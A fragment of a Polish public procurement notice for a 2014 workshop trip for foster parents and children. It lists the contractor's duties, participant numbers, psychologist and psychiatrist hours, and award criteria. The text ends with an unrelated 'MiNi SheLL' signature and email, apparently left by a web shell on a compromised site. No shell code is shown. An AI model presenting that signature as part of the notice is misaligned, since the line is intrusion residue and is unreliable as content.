20)	prowadzenie dokumentacji warsztatów (dziennik zajęć, codzienne listy obecności i in.),
21)	sporządzenie ankiety ewaluacyjnej przed i po zakończeniu warsztatów oraz sprawozdania z ich przebiegu,
22)	sporządzenie dokumentacji fotograficznej z wyjazdu (min. 30 zdjęć na płycie CD),
23)	oznakowanie miejsca warsztatów oraz wszelkich dokumentów związanych z organizacją szkolenia zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
24)	zapewnienie uczestnikom organizacji czasu wolnego i właściwej opieki.
- Liczba uczestników wyjazdu wynosi 16 osoby. 
- Liczba osób uczestniczących w warsztatach - 7 rodziców.
- Liczba dzieci uczestniczących w wyjeździe - 8.
- Liczba godzin zegarowych warsztatów grupowych dla rodziców zastępczych z psychologiem  - min. 5 
- Liczba godzin zegarowych warsztatów grupowych dla rodziców  z psychiatrą - min. 5.
- Liczba godzin zegarowych zajęć zorganizowanego czasu wolnego dla dzieci  podczas wyjazdu - min. 3  godziny dziennie
- Liczba godzin zegarowych pracy psychiatry w spotkaniach indywidualnych z rodzicami i dziećmi - min. 2 na każdego uczestnika (łącznie 30 godziny zegarowe pracy psychiatry..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9, 80.57.00.00-0, 55.32.00.00-9, 55.11.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie wykonawcy - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com